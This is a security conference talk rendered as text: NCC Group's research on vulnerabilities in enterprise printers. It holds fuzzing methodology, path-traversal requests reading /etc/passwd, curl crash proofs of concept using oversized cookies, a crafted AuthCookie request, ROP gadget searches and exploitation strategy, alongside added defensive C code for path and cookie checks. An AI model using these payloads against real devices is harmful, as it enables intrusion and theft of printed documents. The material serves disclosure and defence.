Why you should fear your "mundane" office equipment
Daniel Romero @daniel_rome
Mario Rivas @grifo
Who the hell are these guys?
Daniel Romero Pérez
 Principal Security Consultant
 Focused on IoT / Embedded Systems
 Hardware, RE, exploiting, etc.
 @daniel_rome
 daniel.romero@nccgroup.com
Mario Rivas Vivar
 Senior Security Consultant
 Too many interests
 Lately focused on what you will see here
 @grifo
 mario.rivas@nccgroup.com
Both from NCC Group's Madrid office
Agenda
 Introduction and attack surface
 Testing methodology and fuzzing
 A way across the vulnerabilities found
 Let’s exploit something!
 Conclusions
Introduction
 Figure out the current state of security of enterprise embedded devices (such as printers)
 Medium-size enterprise printers:
 Xerox, HP
 Ricoh, Brother
 Lexmark, Kyocera
 Red Teaming approach
 It wasn’t an assessment
 One RCE vuln would be enough
Why printers?
 Networked printers have been around since at least the 1980s
 They sit on, and are configured on, sensitive parts of corporate networks
 Great for pivoting and launching network attacks
 They process all manner of information
 Corporate Sensitive, Personal Sensitive, Financial, Customer etc.
 They are often assumed to be low risk targets and fairly dumb in capability
 Shadow IT – printers might be purchased through unofficial procurement channels
Attack Surface
[Diagram: attack surface of an embedded device (RTOS or Linux). Areas shown: printer languages and services; management services and others; external services; proximity attacks (WiFi, USB, NFC, etc.); mobile apps; web application and web services; file parsers; updates and firmware; hardware analysis; post-exploitation. A second copy of the diagram highlights the subset covered in this talk: printer languages and services, management services and others, external services, web application and web services, updates and firmware, hardware analysis, and post-exploitation.]
Huge Attack Surface
[Diagram: attack surface map, colour-coded as "Included in the scope" vs. "Not Tested (future work?)"; the colour coding is not recoverable here, and the grouping below is reconstructed from the slide layout.]
Hardware: Exposed Services, UART/Serial, JTAG, Exposed Memories, Maintenance Modes
Firmware: Firmware Updates
Printer Services: RAW, IPP, LPD, SMB, FTP
Web and Web Services: Web Application, Web Services
Management Services: SNMP, Netbios, Telnet, Remote Management
External Software: Mobile Apps, Desktop Applications
External Interactions: Google Cloud Print, AirPrint
Printer Capabilities: WiFi, NFC, WiFi Direct, Access
Printer Languages / File Formats: PJL, PCL, PS, PDF, Image Formats, Others
Other Services: Finger, MDNS, SVRLOC, VNC, Unknown Services
L2 / L3 Protocols: TCP, UDP, ICMP, …
Testing Methodology and Fuzzing
Methodology
[Workflow diagram: Setting Printers Up → Attack Surface Study → Vulnerability Research (State of the Art, Firmware Analysis, Hardware Analysis) → Bug Analysis → Exploitation & Post-Exploitation → Vuln. Disclosure & Research Presentation]
Fuzzing & Approach Taken
 Dumb Fuzzing
 Get valid communications
 Generate random (and invalid) mutations
 Start fuzzing after a few minutes
 Understanding the crash is harder
 Smart Fuzzing
 Implement RFC compliant messages
 Mutate what you want, how you want
 More coding time
 Way easier to investigate the crash
Our fuzzer
 The main objective was to make our life easier while fuzzing
 Based on Sulley Fuzzer for data generation [https://github.com/OpenRCE/sulley]
 Actually, a fork of BooFuzz [https://github.com/jtpereyda/boofuzz]
 Great Request, Connection, Logger and Session modules
 After Sulley and Boo… Wazowski was next, so…
 We called it Fuzzowski
 Python3
 Improved string fuzzing libraries
 Custom lists, files and callback command injection mutations
 Fuzzer modules, to keep all your fuzzers under one single program
 Lots of little tweaks to adapt the fuzzing session
 We tried to solve the difficulties that we were having while fuzzing…
Fuzzowski
Difficulties:
 Different behaviours for the same protocols
 Different ways to detect a crash
 Need to reboot targets manually after a crash
 Retesting a “suspect” packet can be a pain
 Understanding your mutated packets can be hard
 Need to report to the manufacturer a lot of different crashes
Our Solutions:
 Flexibility to adapt the fuzzing session
 Monitor modules to check what we want
 Restarter modules which are called after losing connection to the target
 CLI to pause and control the fuzzing session
 Nice print formats for suspect packets (to know exactly what was fuzzed)
 Save standalone scripts to send a crash PoC
Fuzzowski
[Architecture diagram. Modules: Requests (Blocks, Primitive Types); Connections (UDP, TCP); Loggers (File, Console, SSL); Protocol Fuzzers (IPP, LPD); Monitors (PS, ICMP, Stack Trace); Restarters (Smart Plugs, Exec Command); Suspects / PoCs / Crashes; Fuzzing Session; REPL / SSH CLI; Main Program. Shaded boxes are modified BooFuzz modules.]
Fuzzowski Demo
https://asciinema.org/a/t3WLF5IPo7splsAHDinuuXZEr
The code will be available after the talk:
https://github.com/nccgroup/fuzzowski
Just a bit of Hardware
Hardware Analysis
 Basic approach!
 Focused on things to help us with the exploitation
 Debug interfaces
 Dump memories
 Test points
and...
 Short circuit all the things!
 One of our printers will never print again…
Exposed Memories
# ./flashrom -V -p buspirate_spi:dev=/dev/ttyUSB0,spispeed=1M -r /tmp/flash.bin -c MX25L12835F/MX25L12845E/MX25L12865E
flashrom 0.9.9-91-g0bfa819 on Linux 4.15.0-42-generic (x86_64)
flashrom is free software, get the source code at https://flashrom.org
flashrom was built with libpci 3.2.1, GCC 4.8.4, little endian
Command line (7 args): ./flashrom -V -p buspirate_spi:dev=/dev/ttyUSB0,spispeed=1M -r /tmp/flash.bin -c MX25L12835F/MX25L12845E/MX25L12865E
Using clock_gettime for delay loops (clk_id: 1, resolution: 1ns).
Initializing buspirate_spi programmer
Detected Bus Pirate hardware v3b
Detected Bus Pirate firmware 5.10
Using SPI command set v2.
SPI speed is 1MHz
Raw bitbang mode version 1
Raw SPI mode version 1
The following protocols are supported: SPI.
Probing for Macronix MX25L12835F/MX25L12845E/MX25L12865E, 16384 kB:
probe_spi_rdid_generic: id1 0xc2, id2 0x2018
...
Hardware Issues
 UART/Serial Debugging Ports
 Tons of debug information
 Write and execute your assembly here!
[Board photos with the JTAG and UART headers marked. Pinouts shown: UART: 1 - GND (black), 2 - Rx (yellow), 3 - Tx (green), 4 - VCC. Another UART header: 1 - GND, 2 - Rx, 3 - Tx, 4 - VCC. Third board: JRS1: 1 - GND, 2 - Rx, 3 - Tx, 4 - VCC; JRS2: 1 - VCC, 2 - Rx, 3 - Tx, 4 - GND.]
Hardware Issues
 Hardware Backdooring:
 Serial allowed read, write and execute
 Raspberry Pi → hardware backdoor
 Pi connected to WiFi AP
[Wiring diagram. Printer UART pinout: VCC, GND, Rx, Tx. Raspberry Pi pinout: (4) 5V, (6) GND, (8) GPIO 14 (TXD), (10) GPIO 15 (RXD).]
363:[199714]:<kb_uart >addr/address:show address value
364:[199714]:<kb_uart >addrc/addressc:change address value
367:[199714]:<kb_uart >sh:show shell command help
368:[199714]:<kb_uart >shell:shell run a function in task mode
369:[199714]:<kb_uart >sd/shelld:stop a running shell task
370:[199714]:<kb_uart >sda/shelld,all:stop all running shell task
371:[199714]:<kb_uart >Shell command example:
372:[199714]:<kb_uart >[shell 0x12345678 1234]
373:[199714]:<kb_uart >shell run a function locate at 0x12345678 with arg 1234
Common Flaws Found
Common Web Application Issues
 Weak Default Configurations
 Tons of services exposed enabled by default, with weak configurations
 Default Credentials (or no credentials required!)
 Clear Text Communications
 Cross-Site Request Forgery
 Broken Access Controls
 Cross-Site Scripting issues
Common Web Application Issues
Path Traversal
 Allowed access to files with some extensions anywhere in the filesystem
 sh, js, css, htm...
 Allowed to check whether a file existed or not
 Could also be used to get files that otherwise would require authentication
okhtmfile=/js/../../../etc/passwd - Error 500
okhtmfile=/js/../../../etc/notexist – Error 404
POST /box/set.cgi HTTP/1.1
Content-Type: application/x-www-form-urlencoded
okhtmfile=/js/../../../../../../etc/init.d/hostname.sh&failhtmfile=[...]
HTTP/1.1 200 OK
ETag: "/js/../../../../../../etc/init.d/hostname.sh, Wed, 30 Jan 2019 09:53:39 GMT"
Content-Type: application/x-sh
#!/bin/sh
### BEGIN INIT INFO
# Default-Start: S
# Default-Stop:
# Short-Description: Set hostname based on /etc/hostname
### END INIT INFO
HOSTNAME=$(/bin/hostname)
hostname -b -F /etc/hostname 2> /dev/null
[…]
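An added example (not the printer's code nor NCC Group's) of the check the okhtmfile handling was missing: the extension allow-list (sh, js, css, htm) never helped because "../" reached any directory, so the request path has to be normalised and anchored under the document root. WEB_ROOT, resolve_web_path and the sample paths are assumptions; the traversal samples are the requests from the slide.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAX_SEGS 32
#define WEB_ROOT "/www"   /* assumed document root; the real path is not on the slides */

/* Lexically normalise a request path and anchor it under `root`.
 * Works on the already URL-decoded path (decode first, so "%2e%2e" cannot slip by).
 * Any ".." that would climb above the root is rejected outright rather than clamped:
 * a request like "/js/../../../etc/passwd" is never legitimate and is worth logging.
 * Returns true and fills out[] on success; false on traversal or if out[] is too small. */
bool resolve_web_path(const char *root, const char *path, char *out, size_t outsz) {
    const char *segs[MAX_SEGS];
    size_t lens[MAX_SEGS];
    int depth = 0;

    if (path[0] != '/')
        return false;                      /* only root-relative paths are served */
    for (const char *p = path; *p != '\0'; ) {
        while (*p == '/')
            p++;                           /* collapse repeated slashes */
        if (*p == '\0')
            break;
        const char *start = p;
        while (*p != '\0' && *p != '/')
            p++;
        size_t n = (size_t)(p - start);
        if (n == 1 && start[0] == '.')
            continue;                      /* "." is a no-op */
        if (n == 2 && start[0] == '.' && start[1] == '.') {
            if (depth == 0)
                return false;              /* would escape the root */
            depth--;
            continue;
        }
        if (depth == MAX_SEGS)
            return false;
        segs[depth] = start;
        lens[depth] = n;
        depth++;
    }
    size_t used = strlen(root);
    if (used >= outsz)
        return false;
    memcpy(out, root, used);
    for (int i = 0; i < depth; i++) {
        if (used + 1 + lens[i] >= outsz)
            return false;
        out[used++] = '/';
        memcpy(out + used, segs[i], lens[i]);
        used += lens[i];
    }
    out[used] = '\0';
    return true;
}

/* Helper: 1 if `path` is accepted and maps to `expected` under WEB_ROOT. */
int path_maps_to(const char *path, const char *expected) {
    char buf[256];
    return resolve_web_path(WEB_ROOT, path, buf, sizeof buf) && strcmp(buf, expected) == 0;
}

/* Helper: 1 if `path` is rejected. */
int path_rejected(const char *path) {
    char buf[256];
    return !resolve_web_path(WEB_ROOT, path, buf, sizeof buf);
}

int main(void) {
    /* Constructed okhtmfile values; the last two are the slide's traversal requests. */
    const char *samples[] = {
        "/js/app.js",
        "/js/./lib/../style.css",
        "/js/../../../etc/passwd",
        "/js/../../../../../../etc/init.d/hostname.sh",
    };
    char out[256];
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        if (resolve_web_path(WEB_ROOT, samples[i], out, sizeof out))
            printf("ALLOW  %-45s -> %s\n", samples[i], out);
        else
            printf("REJECT %-45s (traversal)\n", samples[i]);
    }
    return 0;
}
```

This is a lexical check only; if the document root can contain symlinks, resolve the final path with realpath() and compare the prefix again.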
These issues are not bad, but…
Hidden Functionalities
CVE-2019-9934
CVE-2019-13194
CVE-2019-14301
 Printer 1
 Multiple Buffer Overflow Parsing Cookies Values (x6)
 Buffer Overflow Setting WiFi Values
 Buffer Overflow Setting mDNS Values
 Buffer Overflow Setting Notification Alerts
 Buffer Overflow Setting POP3 Values
 Buffer Overflow Setting SMTP Values
 Denial of Service Setting SNMP Values
 LPD Denial of Service by Sending a Queue command
 Buffer Overflow Sending a Crafted LPD Packet
 Multiple Buffer Overflows Parsing IPP Packets (x3)
 Printer 2
 Buffer Overflow in Fax Number
 Buffer Overflow in IPP attribute names
 Buffer Overflow in IPP attribute values
 Buffer Overflow in IPP attribute sizes
 Multiple Buffer Overflows in IPP parser
 Printer 3
 Buffer Overflow in “AuthCookie” cookie
 Heap Buffer Overflow in IPP attribute’s name
 Printer 4
 Buffer Overflow in Content-Type Header
 Buffer Overflow in Authentication Cookie
 Multiple Buffer Overflows parsing IPP Attributes (x3)
 Buffer Overflow in Google Cloud Print
 Printer 5
 Buffer Overflow Parsing The LexLang Cookie
 Buffer Overflow Parsing The Request URI (x6)
 Buffer Overflow Parsing Content-Type Headers
 Memory Corruption in SNMP (DoS)
 Memory Corruption Parsing Config Parameters
 Printer 6
 Buffer Overflow parsing URI paths
 Buffer Overflow in several Web Application Functionalities
 Buffer Overflow with Big Control Files in LPD
 Multiple Memory Corruptions Parsing IPP Packets
Memory Corruption Issues – Crashes Everywhere
Exception address: 0x58585858
Current Processor Status Register:
0x60000013
Task: 0x17bd770 "HC02P"
...
Exception PC = 0x58585858
Current PSR = 0x60000013
--------------------------------------------
TRACE STACK:
--------------------------------------------
current stack = 0x017be52c
start stack = 0x00100000
text_start = 0x00100000
text_end = 0x00a35220
--------------------------------------------
001 : 0x0039c720
002 : 0x0011ad24
Let's Exploit Something! (Part 1)
CVE-2019-14300: Multiple Stack Buffer Overflow Parsing Cookies Values (x6)
Vuln. Exploitation - Going back to 90's exploits?
Stack Buffer Overflow – The easy case
// Decompiled source code
lang_ptr = f_strstr(cookie_header, "print_language");   // start of the token inside the Cookie header
lang_ptr2 = lang_ptr;
if ( p_lang_pointer )
{
    v5 = *p_lang_pointer;
    v6 = v5;
    if ( v5 != ';' )
        v6 = v5;
    if ( v6 ) {
        count = 0;
    } else {
        count = 0;
        do {                                               // count bytes until ';' or NUL, starting at "print_language"
            ++count;
            v9 = *p_lang_pointer++[1];
            v8 = v9 = v10;
            if ( v9 != ';' )
                v10 = v8;
        } while ( !v10 );
    }
    // count includes the 15-byte "print_language=" prefix and is never checked against the size of v_tmp_cookie
    strncpy(v_tmp_cookie, (lang_ptr2 + 15), count - 15);   // Stack Buffer Overflow
}
* Do you really think there is only one bug here?
print_language=XXXXXXXXXXXXXX..  (cookie bytes: 0-14 | 15 | 16-N)
# DoS Proof of Concept 1:
$ curl --cookie "print_language=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX" http://printer/index.asp
# DoS Proof of Concept 2:
$ curl -H 'Cookie: print_language;' http://printer/index.asp
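As an added example (not the decompiled routine from the talk), the same length arithmetic re-created in plain C next to a bounds-checked replacement; the two PoCs above map onto the two defects the comments point at. LANG_BUF_SIZE and the function names are assumptions, since the real size of the stack buffer is not on the slides.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* "print_language=" is 15 bytes: the decompiled routine skips it with lang_ptr2 + 15. */
#define LANG_PREFIX     "print_language="
#define LANG_PREFIX_LEN 15
/* Size of the fixed stack buffer (v_tmp_cookie) is not on the slides: assumed value. */
#define LANG_BUF_SIZE   32

/* Mirrors the length arithmetic of the decompiled code without performing the copy:
 * count the token from the start of "print_language" up to ';' or NUL, then subtract
 * the prefix length. Returns the byte count strncpy would be handed. */
size_t vuln_copy_len(const char *cookie_header) {
    const char *p = strstr(cookie_header, "print_language");
    if (p == NULL)
        return 0;
    size_t count = 0;
    while (p[count] != '\0' && p[count] != ';')
        count++;
    /* Bug 1: count is never compared with the buffer size (PoC 1, a long value).
     * Bug 2: "print_language;" gives count == 14, and 14 - 15 wraps to SIZE_MAX (PoC 2). */
    return count - LANG_PREFIX_LEN;
}

/* 1 if the length handed to strncpy would overrun the assumed buffer, else 0. */
int vuln_overflows(const char *cookie_header) {
    return vuln_copy_len(cookie_header) >= LANG_BUF_SIZE;
}

/* Bounds-checked replacement. Returns the value length, or -1 when the value is
 * absent, empty, or too long for out[outsz]; the caller then falls back to a default. */
int safe_get_print_language(const char *cookie_header, char *out, size_t outsz) {
    const char *p = strstr(cookie_header, LANG_PREFIX);  /* requires the '=' */
    if (p == NULL || outsz == 0)
        return -1;                                        /* "print_language;" ends here */
    p += LANG_PREFIX_LEN;
    size_t n = strcspn(p, ";");                           /* value ends at ';' or NUL */
    if (n == 0 || n >= outsz)
        return -1;                                        /* empty, or no room for the NUL */
    memcpy(out, p, n);
    out[n] = '\0';
    return (int)n;
}

/* Helper: 1 if the safe parser accepts the header and yields `expected`. */
int safe_value_equals(const char *cookie_header, const char *expected) {
    char buf[LANG_BUF_SIZE];
    int n = safe_get_print_language(cookie_header, buf, sizeof buf);
    return n >= 0 && strcmp(buf, expected) == 0;
}

/* Helper: 1 if the safe parser rejects the header. */
int safe_rejects(const char *cookie_header) {
    char buf[LANG_BUF_SIZE];
    return safe_get_print_language(cookie_header, buf, sizeof buf) == -1;
}

int main(void) {
    /* Constructed Cookie header values modelled on the two PoCs above. */
    const char *benign   = "session=abc; print_language=en; theme=dark";
    const char *no_value = "print_language;";            /* PoC 2 */
    char long_value[128] = LANG_PREFIX;                  /* PoC 1: 60-byte value */
    memset(long_value + LANG_PREFIX_LEN, 'X', 60);
    long_value[LANG_PREFIX_LEN + 60] = '\0';

    const char *names[] = { "benign", "long value", "no value" };
    const char *hdrs[]  = { benign, long_value, no_value };
    for (int i = 0; i < 3; i++)
        printf("%-10s vuln copy len=%zu overflow=%d | safe accepts=%d\n",
               names[i], vuln_copy_len(hdrs[i]), vuln_overflows(hdrs[i]),
               !safe_rejects(hdrs[i]));
    return 0;
}
```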
Stack Buffer Overflow – The easy case
Difficulties:
 ASLR (HEAP & STACK)
 No SW Debug
 RTOS (1 Kernel / 1 Binary)
Helpers:
 Direct PC overwritten
 Potential RWX
 No NX
 Mem leak
Vuln. Exploitation - Going back to 90's exploits?
Exploitation chain: Send Shellcode (btw. patterns) → Dump RAM (Mem. Leak) → Identify Shellcode address → Trigger the BoF → Jump to the Shellcode
Stack Buffer Overflow – The easy case
But, what is one of the most important kinds of data managed by a printer?
THE DOCUMENTS!
Stack Buffer Overflow – The easy case
DEMO
Let's Exploit Something! (Part 2)
Buffer Overflow – The tricky case
CVE-2019-13193: Buffer Overflow in Cookie Values
 One of the first bugs found
 Initially, it was not analyzed in depth as:
 No SOFTWARE or HARDWARE debug
 The Kernel implements other protections
GET /deadbeef HTTP/1.1
Host: printer
User-Agent: Mozilla/5.0 Gecko/20100101 Firefox/62.0
Accept-Language: en-US
Cookie: AuthCookie=5a482cb4aabdcc97d5293221dff2ee7f5ca:4hh7fA4675FOnWgJfA7mCq2NsaU6AwoAAA%3D%3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[SNIP]
Connection: close
(Part 1: the hex value before the ":"; Part 2: the base64 value after it)
CVE-2019-13193: Buffer Overflow in Cookie Values
AuthCookie=5a482cb408cc97d5298b6eff2ee7f5ca:4hh7fA4675FOnWgJfA7mCq2NsaU6AwoAAA%3D%3DAAAAAAAAAAAAAAAAAA[SNIP]
After RE'ing the printer's firmware:
1) Parse headers
2) Get cookies values
3) Check the first part of the cookie
4) Get and check the second part of the cookie (after “:”)
4.1) Decode the base64 value
4.2) Get a TOKEN and a KEY from memory
4.3) Calculate a SHA1 HASH from KEY
4.4) …
Buffer Overflow – The tricky case
CVE-2019-13193: Buffer Overflow in Cookie Values
struct cookie_s {
    int *src_ptr;        // base64 cookie string
    int *dst_ptr;        // base64 decoded result
    char junk[4];
    __int16 src_len;     // source len
    __int16 dst_len;     // destination len
};
base64_decode(struct cookie_s *);
int get_check_second_part_cookie(int *b64_cookie_text) {..}
Q: Can you spot the bug?
Buffer Overflow – The tricky case
CVE-2019-13193: Buffer Overflow in Cookie Values
Function get_check_second_part_cookie() emulation (calls strlen, base64_decode, etc.) with Unicorn [https://www.unicorn-engine.org/]:
$ python check-cookie-emul.py $(python -c 'print "A"*100' | base64 -w 0)
==========================
Emulating THUMB code
- snip -
>>> Tracing instruction at 0x1474b78, instruction size = 0x2
ERROR: Invalid memory fetch (UC_ERR_FETCH_UNMAPPED)
>>> r0 = 0x3
>>> r3 = 0x1281010
>>> r4 = 0x41414141
>>> r5 = 0x41414141
>>> lr = 0x1001000
>>> sp = 0x1002000
>>> pc = 0x41414140
========== SP register:
4141414141414141414141414141414141414141414141414141414141414141414141000000000000
Buffer Overflow – The tricky case
CVE-2019-13193: Buffer Overflow in Cookie Values
But everything became insane here:
 No executable STACK - NX
 Firmware addresses didn’t work - ASLR?
 Modified T-KERNEL (RTOS) in use:
 Protection levels
 Thousands of *linker* structures
 Non-monolithic OS - Apps / Tasks (Offsets)
 Shared memory
 Can implement MMU
Therefore, we didn’t know:
 Where and how our shellcode could be executed ( ~ASLR + NX )
 Valid addresses to create a ROP chain
Buffer Overflow – The tricky case
CVE-2019-13193: Buffer Overflow in Cookie Values
Some potential (and insane) approaches:
 RE the T-KERNEL structure – No time!
 RE the bootloader (potential static addresses)
 Identify static memory – Permissions?
 Brute-force random addresses
 Looking for code helpers
Infinite Loop! - Blind Exploitation?
CVE-2019-13193: Buffer Overflow in Cookie Values
Buffer Overflow – The tricky case
Brute-forcing the PC register with potential firmware addresses and figuring out what instructions were executed..
Example 1 - Identifying POP instructions:
Potential Epilog 1:
0x10: ...
0x12: ...
0x14: pop {r0, pc}
[Stack diagram. Before execution, with PC = 0x14, the stack from SP holds: AAAA, AAAA, AAAA, INFINITE_LOOP, … After execution: R0 = AAAA, PC = AAAA. Result: PRINTER DOWN!]
Example 1B - Identifying POP instructions:
Potential Epilog 1:
0x10: ...
0x12: ...
0x14: pop {r0, pc}
[Stack diagram. Before execution, with PC = 0x14, the stack from SP holds: AAAA, INFINITE_LOOP, …, …, … After execution: R0 = AAAA, PC = INFINITE_LOOP. Result: PRINTER UP!]
Buffer Overflow – The tricky case
CVE-2019-13193: Buffer Overflow in Cookie Values
Two matchable behaviours, which allowed us to identify a valid offset assigned to the web RTOS task, were found.
[Diagram comparing firmware data with printer memory. Firmware: 0x12 add sp, 28; 0x14 pop {r0, r1, pc}; 0x512 pop {r0-r7, pc}. Printer memory: 0x1132 add sp, 28; 0x1134 pop {r0, r1, pc}; 0x1632 pop {r0-r7, pc}. In both, the two gadget pairs are 0x500 apart.]
 Task Offset: 0x1132 - 0x12 = 0x1120
 Only for this (web) RTOS task
 This provided us useful ROP gadgets and potential helpers to continue the task execution (which is really important)
Buffer Overflow – The tricky case
What about creating ROP chains with (not coherent) IMAGE (GIF or PNG) offsets?
$ for i in `ls *.{gif,png}`; do echo "========== $i"; python ROPgadget.py --rawArch=arm --rawMode=thumb --binary $i | grep "pop {"; done | grep -E "(==|str r6)"
========== adhoc.gif
========== allow2.gif
- SNIP -
========== device-icons-128.png
0x000000000000034e : str r6, [r5, #0x20] ; lsls r5, r2, #0x1a ; subs r0, #0xa9 ; pop {r1, r4, r5, r6, pc}
0x0000000000000346 : strh r2, [r7, #0x12] ; ldm r6, {r1, r2, r3, r6, r7} ; ldrh r6, [r1, r1] ; add r4, sp, #0x144 ; str r6, [r5, #0x20] ; lsls r5, r2, #0x1a ; subs r0, #0xa9 ; pop {r1, r4, r5, r6, pc}
========== device-icons-512.png
0x0000000000009eb4 : adds r4, #0x61 ; adds r4, r0, #1 ; b #0xa346 ; strh r2, [r3, r5] ; str r6, [sp, #0x14c] ; stm r5!, {r0, r4, r6} ; pop {r2, r4, r5, r6, pc}
- SNIP -
CVE-2019-13193: Buffer Overflow in Cookie Values
"Debug Information Exposed": http://printer/httpd/diag/url_list.html
Buffer Overflow – The tricky case
CVE-2019-13193: Buffer Overflow in Cookie Values
Approach: Using the ROP gadgets found to write a shellcode into RWX memory (e.g. PNG files) and jump to it.
Instruction and Data CACHES!
Some options to flush the cache:
 ARM instructions: MOV r0, #0 ; clear r0, then MCR p15, 0, r0, c7, c5, 0 ; flush the entire instruction cache
 Sleep(), mprotect(), etc. calls
 Continue the execution flow (harder, but the most “professional” option)
Buffer Overflow – The tricky case
CVE-2019-13193: Buffer Overflow in Cookie Values
Continuing the execution flow:
1) ROP (part 1) should execute our payload
2) ROP (part 2) should change the address (within the stack) that overwrites PC once the bug is triggered, with a valid function address (e.g. func 1.1.1)
3) ROP (part 3) should align the SP to the previous state, just before triggering the bug.
4) Trigger the vuln as many times as you want
[Diagram of the task stack frames: Func. 1 at SP = 0x1000, Func. 1.1 at SP = 0x900, Func. 1.1.1 at SP = 0x700, Vuln. Func at SP = 0x550, ....; alongside, the addresses SP = 0x5000, 0x4000, 0x3000, 0x17c0.]
CVE-2019-13193: Buffer Overflow in Cookie Values
Stack Buffer Overflow – The tricky case
DEMO
$ python exploit-persepolis-v2.py
[*]
[*] .-------. Printer buffer overflow exploit (Persepolis)
[*] | ROOT | Author: Daniel Romero (NCC Group)
[*] __|_______|__
[*] | _________--| Firm ver: [REDACTED]
[*] `-/.:::::::.-'
[*] `----------'
[*]
[*]
[*] Usage: ./exploit-persepolis-v2.py write [BYTES_TO_BE_WRITTEN] [JUMP TO SHELLCODE Y/N]
[*] ./exploit-persepolis-v2.py writefile [FILE_PATH]
[*] ./exploit-persepolis-v2.py read [SOURCE_ADDRESS] [SIZE]
[*]
Conclusions
Responsible Vulnerability Disclosure
 We started this process in February!
 Mixed response from the printer manufacturers
 Some had very mature vulnerability disclosure procedures
 Some others did not have any process for this, 2 months stuck trying to contact some of them
 All have published patches solving most of the issues by now
 Security advisories already published:
 https://www.nccgroup.trust/us/our-research/technical-advisory-multiple-vulnerabilities-in-lexmark-printers/
 https://www.nccgroup.trust/us/our-research/technical-advisory-multiple-vulnerabilities-in-hp-printers/
 https://www.nccgroup.trust/us/our-research/technical-advisory-multiple-vulnerabilities-in-brother-printers/
 https://www.nccgroup.trust/us/our-research/technical-advisory-multiple-vulnerabilities-in-ricoh-printers/
 https://www.nccgroup.trust/us/our-research/technical-advisory-multiple-vulnerabilities-in-xerox-printers/
 https://www.nccgroup.trust/us/our-research/technical-advisory-multiple-vulnerabilities-in-kyocera-printers/
Vulnerability Overview
[Diagram summarising the findings per area: Web Application, Hardware, Printer Services, Printer Languages and Other Services, labelled "Too many issues", "Also a lot of issues" and "Code Execution".]
CVE List
HP
CVE-2019-6323 Reflected Cross-Site Scripting
CVE-2019-6324 Stored Cross-Site Scripting
CVE-2019-6325 Cross-Site Request Forgery
CVE-2019-6326 Multiple Buffer Overflow in Web
CVE-2019-6327 Multiple Buffer Overflow in IPP
Lexmark
CVE-2019-9930 Multiple Buffer Overflows in Web
CVE-2019-9931 SNMP Denial of Service Vulnerability
CVE-2019-9932 Multiple Buffer Overflows in Web
CVE-2019-9933 Multiple Buffer Overflows in Web
CVE-2019-9934 Information Disclosure Vulnerabilities
CVE-2019-9935 Information Disclosure Vulnerabilities
CVE-2019-10057 Cross-Site Request Forgery
CVE-2019-10058 No Account Lockout Implemented
CVE-2019-10059 Information Disclosure Vulnerability
Xerox
CVE-2019-13165 Multiple Buffer Overflow in IPP
CVE-2019-13166 No Account Lockout Implemented
CVE-2019-13167 Multiple Stored Cross-Site Scripting
CVE-2019-13168 Multiple Buffer Overflow in IPP
CVE-2019-13169 Buffer Overflow in HTTP Headers
CVE-2019-13170 Cross-Site Request Forgery
CVE-2019-13171 Buffer Overflow in Google Cloud Print Implementation
CVE-2019-13172 Buffer Overflow in Authentication Cookie
Brother
CVE-2019-13192 Heap Overflow in IPP Attribute Names
CVE-2019-13193 Stack Buffer Overflow in Cookie Values
CVE-2019-13194 Information Disclosure Vulnerability in Web Server
Kyocera
CVE-2019-13195 Path Traversal in Web Server
CVE-2019-13196 Multiple Buffer Overflow in Web Server (1)
CVE-2019-13197 Multiple Buffer Overflow in Web Server (2)
CVE-2019-13198 Stored Cross-Site Scripting
CVE-2019-13199 Lack of Cross-Site Request Forgery Countermeasures
CVE-2019-13200 Reflected Cross-Site Scripting
CVE-2019-13201 Buffer Overflow in LPD Service
CVE-2019-13202 Multiple Buffer Overflow in Web Server (3)
CVE-2019-13203 Integer Overflow in Web Server
CVE-2019-13204 Multiple Buffer Overflow in IPP Service
CVE-2019-13205 Broken Access Controls in Web Server
CVE-2019-13206 Multiple Buffer Overflow in Web Server (4)
Ricoh
CVE-2019-14299 No Account Lockout Implemented
CVE-2019-14300 Buffer Overflow in HTTP Headers
CVE-2019-14301 Information Disclosure Vulnerability in Web Server
CVE-2019-14302 Hardware Debug Exposed
CVE-2019-14303 Denial of Service with LPD Command
CVE-2019-14304 Cross-Site Request Forgery
CVE-2019-14305 Multiple Buffer Overflows in Web Application
CVE-2019-14306 Broken Access Controls
CVE-2019-14307 Denial of Service Setting SNMP Values
CVE-2019-14308 Buffer Overflow in LPD Service
CVE-2019-14309 FTP Hardcoded Credentials
CVE-2019-14310 Buffer Overflow in IPP Service (1)
CVE-2019-14311 Buffer Overflow in IPP Service (2)
Impact of the Research & Conclusions
 Common office devices present in all organizations
 Very immature state of security
 Largely ignored in most organizations
 Large number of critical and high risk issues in 6 of 6 printers tested
 Functional PoC Unauthenticated RCE exploits for 4 of them (we ran out of time)
 50 CVEs
 We stopped searching after a few vulnerabilities… there are probably more
 We only looked at a small part of the attack surface… there is a lot more
 The first researcher who takes a look will likely hit the jackpot!
 Shared code between different products of the same vendors
 Huge number of devices affected
Recommendations
For printer manufacturers:
 Security in the product development life cycle
 Assess your products!
 Hardware
 Services
 Code
 Review your vulnerability disclosure procedures
For hackers:
 Give it a try!
 There are vulnerabilities waiting for you
 A lot to learn, and a lot of FUN!
For organizations:
 Start by considering them as threats!
 Inventory of all makes, models and firmware versions
 Ensure that the firmware is updated as you do for any other asset!
 Perform hardening of the printers' config, removing unnecessary services, etc.
What about the Internet?
As expected.. there was a large number of these printers connected to the Internet! and...
Are different manufacturers using the same code?
Acknowledgments!
The research was performed at NCC Group, which gave us the time and resources needed for it.
Thanks to all the Madrid Office, Matt Lewis and Phillip Moss for their support, giving us ideas and helping us with the talk.
And last but not least… we would like to thank Álvaro Felipe (@alvaro_fe), who took part in this research during the first days and helped us with great ideas during the exploitation phases.
Thank you for suffering us
Daniel Romero @daniel_rome
Mario Rivas @grifo
Achievement Unlocked!
Talk at DEF CON!

Felipe Prado
 
PDF
DEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionist
Felipe Prado
 
PDF
DEF CON 24 - Rose and Ramsey - picking bluetooth low energy locks
Felipe Prado
 
PDF
DEF CON 24 - Rich Mogull - pragmatic cloud security
Felipe Prado
 
PDF
DEF CON 24 - Grant Bugher - Bypassing captive portals
Felipe Prado
 
PDF
DEF CON 24 - Patrick Wardle - 99 problems little snitch
Felipe Prado
 
PDF
DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...
Felipe Prado
 
PDF
